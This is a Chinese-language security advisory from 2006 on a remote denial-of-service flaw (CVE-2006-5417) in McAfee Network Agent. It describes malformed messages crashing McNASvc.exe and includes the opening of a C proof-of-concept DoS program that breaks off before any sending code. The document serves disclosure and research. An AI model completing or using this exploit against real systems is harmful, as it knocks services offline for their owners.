McAfee Network Agent远程拒绝服务漏洞
发布日期:2006-10-13
更新日期:2006-10-16
受影响系统:McAfee Network Agent 1.0.178.0
描述:
BUGTRAQ ID:
20496
CVE(CAN) ID:
CVE-2006-5417
McAfee Network Agent是很多McAfee产品中所使用的一个网络服务。
McAfee Network Agent在处理畸形消息时存在漏洞,远程攻击者可能利用此漏洞对服务执行拒绝服务攻击。
McAfee Network Agent (McNASvc.exe)在处理字符串位置字段中包含有无效值的特制消息时存在漏洞。如果接受到了这样的消息的话,就可能导致服务崩溃。
<*来源:JAAScois (www[dot]jaascois[dot]com)
链接:
http://secunia.com/advisories/22371/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rated as : Critical risk
/////////////////////////////////////////////////////
// Mcafee Network Agent (mcnasvc.exe) Remote DoS
// By JAAScois [
http://www[dot]jaascois[dot]com ]
// Teston [ mcnasvc.exe ver1.0.178.0 ]
// Path [C:\Program Files\Common Files\McAfee\MNA]
// Port: [6646]
/////////////////////////////////////////////////////
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
int main (int argc, char *argv[]){
struct sockaddr_in tcp;
static SOCKET sock;
int ii=0;
unsigned char buf[17000];
WSADATA wsaData;
// packet
for(ii=0;ii<17000;ii++){
buf[ii]=0x90;
}
printf("[>>] Mcafee Network Agent (mcnasvc.exe ver 1.0.178.0)
Remote DoS
\n");
printf("[>>] By JAAScois [
http://www[dot]jaascois[dot]com ]
\n");
printf("[>>] +\n");
printf("[>>] +\n");
if(argc<2){
printf("[>>] Usage:%s 190.160.24.1\n",argv[0]);
return 1;
}
建议:
厂商补丁:
McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mcafee.com/浏览次数:3021
严重程度:0(网友投票)
